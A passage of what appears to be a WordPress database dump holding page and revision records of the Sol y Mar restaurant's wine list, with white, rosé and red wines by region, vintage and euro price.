23,00\r\n\r\n&nbsp;\r\n\r\nBio Vio                             Pigato di Albenga D.O.C.                          “15 € 23,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Lombardia…………………………………………………………..………….</u></strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nCà dei Frati            Brolettino D.O.C.                           (NO)          “17 € 19,50\r\n\r\n&nbsp;\r\n\r\nTenuta Belvedere   Wai I.G.T.              “16 € 18,00\r\n\r\n&nbsp;','Piemonte','','inherit','closed','closed','','83-revision-v1','','','2020-06-10 15:17:12','2020-06-10 13:17:12','',83,'https://www.ristorantesolymar.it/2020/06/10/83-revision-v1/',0,'revision','',0),(996,2,'2020-06-10 15:18:44','2020-06-10 13:18:44','<u>     SOL Y MAR</u>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u>   Trentino Alto Adige…………………………………………….</u></strong>\r\n\r\n&nbsp;\r\n\r\n<strong> </strong>\r\n\r\nHartmann Donà              Donà Blanc I.G.T.                               “11 € 27,00\r\n\r\n&nbsp;\r\n\r\nKossler                             Gewurztraminer D.O.C.                              “18 € 20,00\r\n\r\n&nbsp;\r\n\r\nGirlan                               Gewurztraminer D.O.C.                             “18 € 20,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<ol>\r\n 	<li>Michele Appiano Sauvignon St Valentin D.O.C.                   “17 € 32,00</li>\r\n</ol>\r\n&nbsp;\r\n\r\nGewurztraminer St Valentin D.O.C.        “17 € 32,00\r\n\r\n&nbsp;\r\n\r\nFalkenstein                      Riesling D.O.C.                                                “16 € 24,00\r\n\r\n&nbsp;\r\n\r\nPinot Bianco D.O.C.                                        “16 € 22,00\r\n\r\n&nbsp;\r\n\r\nSauvignon D.O.C.                                            “16 € 23,00\r\n\r\n&nbsp;\r\n\r\nNossing                             Kerner Valle Isarco D.O.C.          (NO)            “17 € 23,00\r\n\r\n&nbsp;\r\n\r\nPeter Dipoli                      Voglar Sauvignon D.O.C.          (NO)            “15 € 26,00\r\n\r\n&nbsp;\r\n\r\nFranz Haas                      Manna Vigneti delle dolomiti I.G.T. (NO) “17 € 26,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Veneto…………………………………………………………………….</u></strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nInama                               Vulcaia Fumè Sauvignon IGT                     “16 € 36,00\r\n\r\n&nbsp;\r\n\r\nGiovanni Menti               Riva Arsiglia                                                     “16 € 22,00\r\n\r\n&nbsp;\r\n\r\nCostadilà Bianco             330 SLM non filtrato Costadilà                      € 21,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Trentino Alto Adige','','inherit','closed','closed','','85-revision-v1','','','2020-06-10 15:18:44','2020-06-10 13:18:44','',85,'https://www.ristorantesolymar.it/2020/06/10/85-revision-v1/',0,'revision','',0),(997,2,'2020-06-10 15:20:05','2020-06-10 13:20:05','<strong><u>   SOL Y MAR</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u>   Friuli Venezia Giulia……………………………………………………..</u></strong>\r\n\r\n<strong> </strong>\r\n\r\n<strong> </strong>\r\n\r\nSkerk                                Vitovska I.G.T. Venezia Giulia                         € 29,00\r\n\r\n&nbsp;\r\n\r\nRonco dei tassi                 Friulano D.O.P. (tocai)                               “17   € 20,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nVie di Romans                     Chardonnay Isonzo D.O.C.                               “17   € 28,00\r\n\r\nSauvignon Isonzo D.O.C.                                  “16   € 28,00\r\n\r\n&nbsp;\r\n\r\nLis Neris                        Lis Bianco I.G.T.                                               “15   € 29,00\r\n\r\n&nbsp;\r\n\r\nGris Pinot Grigio D.O.C.                                    “16   € 23,00\r\n\r\n&nbsp;\r\n\r\nDamijan Podversic           Ribolla gialla I.G.T. Venezia Giulia            “14 € 36,00\r\n\r\n&nbsp;\r\n\r\nMalvasia istriana I.G.T. Venezia Giulia      “14   € 36,00\r\n\r\n&nbsp;\r\n\r\nVenica                               Sauvignon Ronco delle Mele D.O.C.                “17 € 39,00\r\n\r\n&nbsp;\r\n\r\nJermann                           Vintage Tunina bianco Venezia G. I.G.T.     “16 € 60,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Friuli Venezia Giulia','','inherit','closed','closed','','87-revision-v1','','','2020-06-10 15:20:05','2020-06-10 13:20:05','',87,'https://www.ristorantesolymar.it/2020/06/10/87-revision-v1/',0,'revision','',0),(998,2,'2020-06-10 15:21:18','2020-06-10 13:21:18','<u>SOL Y MAR</u>\r\n\r\n<u> </u>\r\n\r\n<strong><u>     Marche………………………………………………………………….</u></strong>\r\n\r\n<u> </u>\r\n\r\n<u> </u>\r\n\r\nMarotti Campi     Albiano Verdicchio dei Cast. di Jesi classico D.O.C. “17    €10,00\r\n\r\n&nbsp;\r\n\r\nCollestefano         Verdicchio di Matelica D.O.C.                                        “18   € 16,00\r\n\r\n&nbsp;\r\n\r\nLa Monacesca       Verdicchio di Matelica D.O.C.                                         “17  € 18,00\r\n\r\n&nbsp;\r\n<ol>\r\n 	<li>San Lorenzo   Le Oche Verdicchio CdJ classico D.O.C.   (NO)    “17 € 19,00</li>\r\n</ol>\r\nCampo delle Oche verdicchio CdJ class. sup D.O.C. (NO) “14 € 24,00\r\n\r\nAzienda Agricola Fiorano   Donna Orgilla (bio)                                          “17 € 19,00\r\n\r\nVigneti Vallorani   Avora   Falerio D.O.C. (bio)                                              “17 € 17,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Toscana…………………………………………………………………….</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\nTunia                            Chiarofiore Toscana bianco I.G.T.                          “13   € 21,00\r\n\r\n<strong><u> </u></strong>\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Abruzzo……………………………………….……………………………..</u></strong>\r\n\r\n<strong> </strong>\r\n\r\n<strong> </strong>\r\n\r\nEmidio Pepe                  Trebbiano D’Abruzzo D.O.C.                               “15 € 50,00\r\n\r\nEmidio Pepe                 Pecorino Colli Aprutini IGT                            “17 € 50,00\r\n\r\n&nbsp;\r\n\r\nMasciarelli                     Marina Cvetic Treb.d’Abruzzo ris. D.O.C.          “15 € 35,00\r\n\r\n&nbsp;\r\n\r\nFrancesco cirelli            Trebbiano d’Abruzzo D.O.C. “bio”                 “16 € 16,00\r\n\r\n&nbsp;\r\n\r\nTrebbiano d’Abruzzo D.O.C. anfora“bio”       “17 € 27,00\r\n\r\n&nbsp;\r\n\r\nValentini                        Trebbiano d’Abruzzo D.O.C.                               “15 € 90,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Marche','','inherit','closed','closed','','89-revision-v1','','','2020-06-10 15:21:18','2020-06-10 13:21:18','',89,'https://www.ristorantesolymar.it/2020/06/10/89-revision-v1/',0,'revision','',0),(999,2,'2020-06-10 15:22:47','2020-06-10 13:22:47','<strong><u>    SOL Y MAR</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u>   Puglia…………………………………………………………..………….</u></strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nGreco Bianco           salento 141   Archetipo                                     “ 17      € 17,00\r\n\r\n<strong><u> </u></strong>\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Campania……………………………………….……………………………..</u></strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nBajola                               Bianco (non filtrato non chiarificato)             “15    € 27,00\r\n\r\n&nbsp;\r\n\r\nCantina dei Monaci     Beneventano Falanghina I.G.T.                 “18     € 16,00\r\n\r\n&nbsp;\r\n\r\nCantina dell’Angelo       Greco di Tufo D.O.C.G.                                       “16     € 19,00\r\n\r\n&nbsp;\r\n\r\nCiro Picariello               Fiano di Avellino D.O.C.G.                (NO)         “18    € 21,00\r\n\r\n&nbsp;\r\n\r\nFerrara Benito              Vigna Cicogna Greco di tufo D.O.C.G.             “18   € 23,00\r\n\r\n&nbsp;\r\n\r\nIl Tufiello                     Don Chisciotte Fiano I.G.T.  (biod.)                “16 € 24,00\r\n\r\n&nbsp;\r\n\r\nMarisa Cuomo             Costa di Amalfi furore D.O.C.                     “17 € 22,00\r\n\r\n&nbsp;\r\n\r\nFiorduva Furore Bianco Amalfi D.O.C.           “16 € 60,00\r\n\r\n&nbsp;\r\n\r\nLuigi Maffini                   Kratos Fiano Cilento D.O.P.                             “16 € 19,00\r\n\r\nPietraincatenata Fiano Cilento D.O.P.             “15 € 25,00\r\n\r\n&nbsp;\r\n\r\nQuintodecimo                 Exultet Fiano di Avellino D.O.C.G.                     “17 € 45,00\r\n\r\n&nbsp;\r\n\r\nCantina Morone             Falanghina Monaci                                                 “17 € 16,00','Puglia','','inherit','closed','closed','','91-revision-v1','','','2020-06-10 15:22:47','2020-06-10 13:22:47','',91,'https://www.ristorantesolymar.it/2020/06/10/91-revision-v1/',0,'revision','',0),(1000,2,'2020-06-10 15:23:37','2020-06-10 13:23:37','<strong><u>   SOL Y MAR</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u>   Sicilia…………………………………………….</u></strong>\r\n\r\n<strong> </strong>\r\n\r\n<strong> </strong>\r\n\r\nDonnafugata          La Fuga chardonnay Entellina                        “17       € 20,00\r\n\r\n&nbsp;\r\n\r\nChiarandà chardonnay Entellina D.O.P.       “16       € 32,00\r\n\r\n&nbsp;\r\n\r\nGraci                         Etna bianco D.O.C.                                       “18    € 20,00\r\n\r\n&nbsp;\r\n\r\nMarco de Bartoli     Sole e Vento I.G.T.                                      “17 € 21,00\r\n\r\n&nbsp;\r\n\r\nSP68                         Terre Siciliane Bianco IGT Occhipinti             “18 € 21,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Sardegna…………………………………………………………………….</u></strong>\r\n\r\n<strong> </strong>\r\n\r\n<strong> </strong>\r\n\r\nCapichera               Vigna’ngena Vermentino D.O.C.G.                          “17 € 35,00\r\n\r\n&nbsp;\r\n\r\nCamminera            Adarya Vermentino.                                                 “18   € 19,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nTenuta Dettori       Renosu Bianco                                             “18   € 17,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Sicilia','','inherit','closed','closed','','96-revision-v1','','','2020-06-10 15:23:37','2020-06-10 13:23:37','',96,'https://www.ristorantesolymar.it/2020/06/10/96-revision-v1/',0,'revision','',0),(1003,2,'2020-06-10 15:27:06','2020-06-10 13:27:06','<strong><u>   SOL Y MAR</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Germania………………………………………………………………......</u></strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nDr. Loosen              Blau Schiefer Riesling Troken                (NO)    “17       € 23,00\r\n\r\n&nbsp;\r\n\r\nMarkus Molitor      Riesling Haus Klosterberg Troken         (NO)   “17         € 22,00\r\n\r\nSchloss Johannisberg   Riesling Gelblack Qualitätswein feinherb     “15     € 29,00\r\n\r\n&nbsp;\r\n\r\nKerper                    Riesling Wehlener Sonnenuhr Spàtlese Troken      “16         € 24,00\r\n\r\n&nbsp;\r\n\r\nJoh. Jos. Prum       Riesling kabinett                                                 “16       € 29,00\r\n\r\n&nbsp;\r\n\r\nRiesling wehlener sonnenuhr spatlese               “16     € 47,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Spagna……………………………………………………………………...</u></strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nLopez de Heredia  Vina Gravonia Blanco Crianza                             (NO)       “       € 27,00\r\n\r\n&nbsp;\r\n\r\nVina Tondonia Blanco reserva                                  “04     € 50,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong><u>     Slovenia.....................................................................................................</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\nMovia                       Pinot Grigio                                                     ”16  € 27,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Nuova Zelanda………………………………………………..………….</u></strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nSaint Clair              Sauvignon Blanc                                                             “17 € 28,00','Germania','','publish','closed','closed','','germania','','','2020-06-10 15:31:47','2020-06-10 13:31:47','',22,'https://www.ristorantesolymar.it/?page_id=1003',18,'page','',0),(1004,2,'2020-06-10 15:27:06','2020-06-10 13:27:06','<strong><u>   SOL Y MAR</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Germania………………………………………………………………......</u></strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nDr. Loosen              Blau Schiefer Riesling Troken                (NO)    “17       € 23,00\r\n\r\n&nbsp;\r\n\r\nMarkus Molitor      Riesling Haus Klosterberg Troken         (NO)   “17         € 22,00\r\n\r\nSchloss Johannisberg   Riesling Gelblack Qualitätswein feinherb     “15     € 29,00\r\n\r\n&nbsp;\r\n\r\nKerper                    Riesling Wehlener Sonnenuhr Spàtlese Troken      “16         € 24,00\r\n\r\n&nbsp;\r\n\r\nJoh. Jos. Prum       Riesling kabinett                                                 “16       € 29,00\r\n\r\n&nbsp;\r\n\r\nRiesling wehlener sonnenuhr spatlese               “16     € 47,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Spagna……………………………………………………………………...</u></strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nLopez de Heredia  Vina Gravonia Blanco Crianza                             (NO)       “       € 27,00\r\n\r\n&nbsp;\r\n\r\nVina Tondonia Blanco reserva                                  “04     € 50,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong><u>     Slovenia.....................................................................................................</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\nMovia                       Pinot Grigio                                                     ”16  € 27,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Nuova Zelanda………………………………………………..………….</u></strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nSaint Clair              Sauvignon Blanc                                                             “17 € 28,00','Germania','','inherit','closed','closed','','1003-revision-v1','','','2020-06-10 15:27:06','2020-06-10 13:27:06','',1003,'https://www.ristorantesolymar.it/2020/06/10/1003-revision-v1/',0,'revision','',0),(1005,2,'2020-06-10 15:29:58','2020-06-10 13:29:58','<strong><u>   SOL Y MAR</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u>   Francia…………………………………………….</u></strong>\r\n\r\n<strong> </strong>\r\n\r\n<strong>   Alsazia</strong>\r\n\r\n&nbsp;\r\n\r\nFernand Hengel         Gewurztraminer Alsace                                      “16     € 21,00\r\n\r\nRiesling Alsace                                                      “17   € 21,00 Domaine R. Gresser Kritt Gewurztraminer Alsace                        “17    € 22,00\r\n\r\n&nbsp;\r\n\r\n<strong>   Loira</strong>\r\n\r\nNicolas Reau             Attention Chenin Méchant                            “17   € 25,00\r\n\r\nDomaine Breton         La Dilettante Vouvray sec                                   “15   € 23,00\r\n\r\nChateau Pierre Bise   Anjou le Haute de la Garde                                  “16   € 22,00\r\n\r\nBouchié-Chatellier     Pouilly-fumé Argiles                                            “17 € 27,00\r\n\r\nClos Naudin                   Vouvray Sec                                                                  “16   € 37,00\r\n\r\nPascal Cotat              Le Monts Damnes                                                       “16   € 50,00\r\n\r\nThierry Germain       L’Insolite Samur                                                “17 € 35,00\r\n\r\nBruno Cormerais    Muscadet Vieilles Vignes Sevre et Maine sur lie “15   € 19,00\r\n\r\n&nbsp;\r\n\r\n<strong>   Borgogna</strong>\r\n\r\nMarc Morey et Fils             Bourgogne a. b. c.                                                         “16 € 35,00\r\n\r\nMoreau Naudet         Chablis appellation Chablis Controllèe                 “16 € 29,00\r\n\r\nBachelet- Monnot     Bourgogne Blanc                                             (NO)   “15 € 27,00\r\n\r\nMarc Morey et Fils             Chassagne Montrachet 1er Crù Les Chenevottes     “13 € 75,00\r\n\r\nChassagne Montrachet                                                   “15 € 65,00\r\n\r\nVerget                           Poully Fuissè La roche appellation cont.               “17 € 48,00\r\n<ol>\r\n 	<li>Bouzerau et Fils Mersault les Grands Charrons                              “16 € 55,00</li>\r\n</ol>\r\nJean-Claude Bessin     Chablis Vieilles Vignes app. ch. Cont.                   “17 €32,00\r\n\r\n&nbsp;\r\n\r\n<strong>   C</strong> <strong>tes du Jura </strong>\r\n\r\nDomaine Macle             Côtes du Jura                                                             “13 € 40,00\r\n\r\nDomaine Matassa       Vin de France Blanc \"Cuvée Alexandria\" (NO) “17 € 35,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong>   Rossiglione</strong>\r\n\r\nDomaine Gauby         Calcinaires Cotes Catalanes I.G.P.                      “17 € 25,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong>Provenza</strong>\r\n\r\nChateau Les Valentines    Cotes de provence rosé ( fermo )                       “17 € 23,00\r\n\r\nRaimond De Villeneuve       Petit Salè                                                             “18 € 22,00','Francia','','publish','closed','closed','','francia-2','','','2020-06-10 15:30:11','2020-06-10 13:30:11','',22,'https://www.ristorantesolymar.it/?page_id=1005',17,'page','',0),(1006,2,'2020-06-10 15:29:58','2020-06-10 13:29:58','<strong><u>   SOL Y MAR</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u>   Francia…………………………………………….</u></strong>\r\n\r\n<strong> </strong>\r\n\r\n<strong>   Alsazia</strong>\r\n\r\n&nbsp;\r\n\r\nFernand Hengel         Gewurztraminer Alsace                                      “16     € 21,00\r\n\r\nRiesling Alsace                                                      “17   € 21,00 Domaine R. Gresser Kritt Gewurztraminer Alsace                        “17    € 22,00\r\n\r\n&nbsp;\r\n\r\n<strong>   Loira</strong>\r\n\r\nNicolas Reau             Attention Chenin Méchant                            “17   € 25,00\r\n\r\nDomaine Breton         La Dilettante Vouvray sec                                   “15   € 23,00\r\n\r\nChateau Pierre Bise   Anjou le Haute de la Garde                                  “16   € 22,00\r\n\r\nBouchié-Chatellier     Pouilly-fumé Argiles                                            “17 € 27,00\r\n\r\nClos Naudin                   Vouvray Sec                                                                  “16   € 37,00\r\n\r\nPascal Cotat              Le Monts Damnes                                                       “16   € 50,00\r\n\r\nThierry Germain       L’Insolite Samur                                                “17 € 35,00\r\n\r\nBruno Cormerais    Muscadet Vieilles Vignes Sevre et Maine sur lie “15   € 19,00\r\n\r\n&nbsp;\r\n\r\n<strong>   Borgogna</strong>\r\n\r\nMarc Morey et Fils             Bourgogne a. b. c.                                                         “16 € 35,00\r\n\r\nMoreau Naudet         Chablis appellation Chablis Controllèe                 “16 € 29,00\r\n\r\nBachelet- Monnot     Bourgogne Blanc                                             (NO)   “15 € 27,00\r\n\r\nMarc Morey et Fils             Chassagne Montrachet 1er Crù Les Chenevottes     “13 € 75,00\r\n\r\nChassagne Montrachet                                                   “15 € 65,00\r\n\r\nVerget                           Poully Fuissè La roche appellation cont.               “17 € 48,00\r\n<ol>\r\n 	<li>Bouzerau et Fils Mersault les Grands Charrons                              “16 € 55,00</li>\r\n</ol>\r\nJean-Claude Bessin     Chablis Vieilles Vignes app. ch. Cont.                   “17 €32,00\r\n\r\n&nbsp;\r\n\r\n<strong>   C</strong> <strong>tes du Jura </strong>\r\n\r\nDomaine Macle             Côtes du Jura                                                             “13 € 40,00\r\n\r\nDomaine Matassa       Vin de France Blanc \"Cuvée Alexandria\" (NO) “17 € 35,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong>   Rossiglione</strong>\r\n\r\nDomaine Gauby         Calcinaires Cotes Catalanes I.G.P.                      “17 € 25,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong>Provenza</strong>\r\n\r\nChateau Les Valentines    Cotes de provence rosé ( fermo )                       “17 € 23,00\r\n\r\nRaimond De Villeneuve       Petit Salè                                                             “18 € 22,00','Francia','','inherit','closed','closed','','1005-revision-v1','','','2020-06-10 15:29:58','2020-06-10 13:29:58','',1005,'https://www.ristorantesolymar.it/2020/06/10/1005-revision-v1/',0,'revision','',0),(1007,2,'2020-06-10 15:33:23','2020-06-10 13:33:23','<u>   SOL Y MAR</u>\r\n\r\n<u>I VINI ROSATI</u>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<u> </u>\r\n\r\n<strong><u>   Lombardia……………………………………………………………………..….</u></strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nCà dei Frati               Rosa dei Frati D.O.C. (fermo)                        € 16,00\r\n\r\n&nbsp;\r\n\r\nCuvèe dei frati metodo classico Brut                    € 25,00\r\n\r\nCà del Vént                 Brut Rosè Pas Operè millesimo                 (NO)  € 42,00\r\n\r\n&nbsp;\r\n\r\nFaccoli                                Franciacorta rose brut D.O.C.G.                               € 30,00\r\n\r\n&nbsp;\r\n\r\nVilla                                Franciacorta brut rosé D.O.C.G.                        € 31,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Trentino-Alto Adige…………………………………………………………..….</u></strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nPojer e Sandri             Brut Rosè                                                                     € 30,00\r\n\r\n&nbsp;\r\n\r\nRevì                               Trento D.O.C. Rosè                                                    € 25,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Marche……………………………………………………………………………..</u></strong>\r\n\r\n<u> </u>\r\n\r\n<u> </u>\r\n\r\nMarotti Campi             Brut rosè   (da uve lacrima di morro)                 € 16,00\r\n\r\nMarotti Campi             Rosè Fermo (da uve lacrima di morro)             € 13,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Sicilia……..……………………………………………………………………..….</u></strong>\r\n\r\n&nbsp;\r\n\r\nMurgo                            Brut Rosè Metodo Classico                                      € 25,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Francia…………………………………………………………………………….</u></strong>\r\n\r\n<u>     </u>\r\n\r\nChateau Les Valentines   Cotes de provence rosé ( fermo )                 € 23,00\r\n\r\n&nbsp;\r\n\r\nPascal Doquet         Champagne brut rosé 1°ers cru                                                         € 62,00\r\n\r\n&nbsp;\r\n\r\nLamiable                  Grand cru rosé                                               (NO)    € 47,00\r\n\r\n&nbsp;\r\n\r\nLaurent-Perrier       Cuvée Rosé Tours Sur Marne                              € 70,00','Vini Rosati','','inherit','closed','closed','','100-revision-v1','','','2020-06-10 15:33:23','2020-06-10 13:33:23','',100,'https://www.ristorantesolymar.it/2020/06/10/100-revision-v1/',0,'revision','',0),(1008,2,'2020-06-10 15:34:55','2020-06-10 13:34:55','<u>   SOL Y MAR</u>\r\n\r\n<u>I VINI ROSsI</u>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<u> </u>\r\n\r\n<strong><u>   Emilia Romagna………………………………………………………………...</u></strong>\r\n\r\n&nbsp;\r\n\r\nSan Patrignano               Aulente Rosso I.G.T.                                 (NO)     € 16,00\r\n\r\n&nbsp;\r\n\r\nPoderi del Nespoli          Fico Grande Sangiovese D.O.C.                        € 14,00\r\n\r\nPrugneto Sang.Sup. D.O.C.                               € 17,00\r\n\r\n&nbsp;\r\n\r\nMutiliana                         Ecce Draco Pinot Nero I.G.P.                               € 25,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Piemonte………………………………………………………………………….</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\nCa’ del Baio                       Asili barbaresco D.O.C.G.                           € 32,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Alto Adige…………………………………………………………………………</u></strong>\r\n\r\n<u> </u>\r\n\r\nGirlan                               Patricia Pinot Nero D.O.C.                                 € 20,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Marche……..……………………………………………………………………..</u></strong>\r\n\r\n&nbsp;\r\n\r\nUmani Ronchi                 Fonte del Re Lacrima di Morro D.O.C.            € 17,00\r\n\r\nTerracruda                       Vettina Pergola Rosso D.O.C.        (NO)   € 14,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Toscana…………………………………………………………………………….</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<u> </u>\r\n\r\nFattoria Torre a Cona     Chianti colli fiorentini D.O.C.G.                       € 15,00\r\n\r\nCantina di Montalcino     Rosso di Montalcino D.O.C.                         € 18,00\r\n\r\nTunia                                     Chiassobuio Toscana igt                               € 21,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Abruzzo…………………………………………………………………………….</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\nEmidio Pepe                         Montepulciano D’ Abruzzo                             € 40,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Sicilia…………………………………………………………………   </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\nDonnafugata                       Sherazade nero d’Avola D.O.C.                   € 28,00\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u>   Spagna…………………………………………………………………………….</u></strong>\r\n\r\n&nbsp;\r\n\r\nLopez de Heredia                 Vina cubillo 2008                                               € 26,00','Vini Rossi','','inherit','closed','closed','','100-revision-v1','','','2020-06-10 15:34:55','2020-06-10 13:34:55','',100,'https://www.ristorantesolymar.it/2020/06/10/100-revision-v1/',0,'revision','',0),(1009,2,'2020-06-10 15:38:49','2020-06-10 13:38:49','<u>   SOL Y MAR</u>\r\n\r\n<u>I VINI ROSATI</u>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<u> </u>\r\n\r\n<strong><u>   Lombardia……………………………………………………………………..….</u></strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nCà dei Frati               Rosa dei Frati D.O.C. (fermo)                        € 16,00\r\n\r\n&nbsp;\r\n\r\nCuvèe dei frati metodo classico Brut                    € 25,00\r\n\r\nCà del Vént                 Brut Rosè Pas Operè millesimo                 (NO)  € 42,00\r\n\r\n&nbsp;\r\n\r\nFaccoli                                Franciacorta rose brut D.O.C.G.                               € 30,00\r\n\r\n&nbsp;\r\n\r\nVilla                                Franciacorta brut rosé D.O.C.G.                        € 31,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Trentino-Alto Adige…………………………………………………………..….</u></strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nPojer e Sandri             Brut Rosè                                                                     € 30,00\r\n\r\n&nbsp;\r\n\r\nRevì                               Trento D.O.C. Rosè                                                    € 25,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Marche……………………………………………………………………………..</u></strong>\r\n\r\n<u> </u>\r\n\r\n<u> </u>\r\n\r\nMarotti Campi             Brut rosè   (da uve lacrima di morro)                 € 16,00\r\n\r\nMarotti Campi             Rosè Fermo (da uve lacrima di morro)             € 13,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Sicilia……..……………………………………………………………………..….</u></strong>\r\n\r\n&nbsp;\r\n\r\nMurgo                            Brut Rosè Metodo Classico                                      € 25,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Francia…………………………………………………………………………….</u></strong>\r\n\r\n<u>     </u>\r\n\r\nChateau Les Valentines   Cotes de provence rosé ( fermo )                 € 23,00\r\n\r\n&nbsp;\r\n\r\nPascal Doquet         Champagne brut rosé 1°ers cru                                                         € 62,00\r\n\r\n&nbsp;\r\n\r\nLamiable                  Grand cru rosé                                               (NO)    € 47,00\r\n\r\n&nbsp;\r\n\r\nLaurent-Perrier       Cuvée Rosé Tours Sur Marne                              € 70,00','Vini Rosati','','publish','closed','closed','','vini-rosati','','','2020-06-10 15:39:23','2020-06-10 13:39:23','',22,'https://www.ristorantesolymar.it/?page_id=1009',19,'page','',0),(1010,2,'2020-06-10 15:38:49','2020-06-10 13:38:49','<u>   SOL Y MAR</u>\r\n\r\n<u>I VINI ROSATI</u>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<u> </u>\r\n\r\n<strong><u>   Lombardia……………………………………………………………………..….</u></strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nCà dei Frati               Rosa dei Frati D.O.C. (fermo)                        € 16,00\r\n\r\n&nbsp;\r\n\r\nCuvèe dei frati metodo classico Brut                    € 25,00\r\n\r\nCà del Vént                 Brut Rosè Pas Operè millesimo                 (NO)  € 42,00\r\n\r\n&nbsp;\r\n\r\nFaccoli                                Franciacorta rose brut D.O.C.G.                               € 30,00\r\n\r\n&nbsp;\r\n\r\nVilla                                Franciacorta brut rosé D.O.C.G.                        € 31,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Trentino-Alto Adige…………………………………………………………..….</u></strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nPojer e Sandri             Brut Rosè                                                                     € 30,00\r\n\r\n&nbsp;\r\n\r\nRevì                               Trento D.O.C. Rosè                                                    € 25,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Marche……………………………………………………………………………..</u></strong>\r\n\r\n<u> </u>\r\n\r\n<u> </u>\r\n\r\nMarotti Campi             Brut rosè   (da uve lacrima di 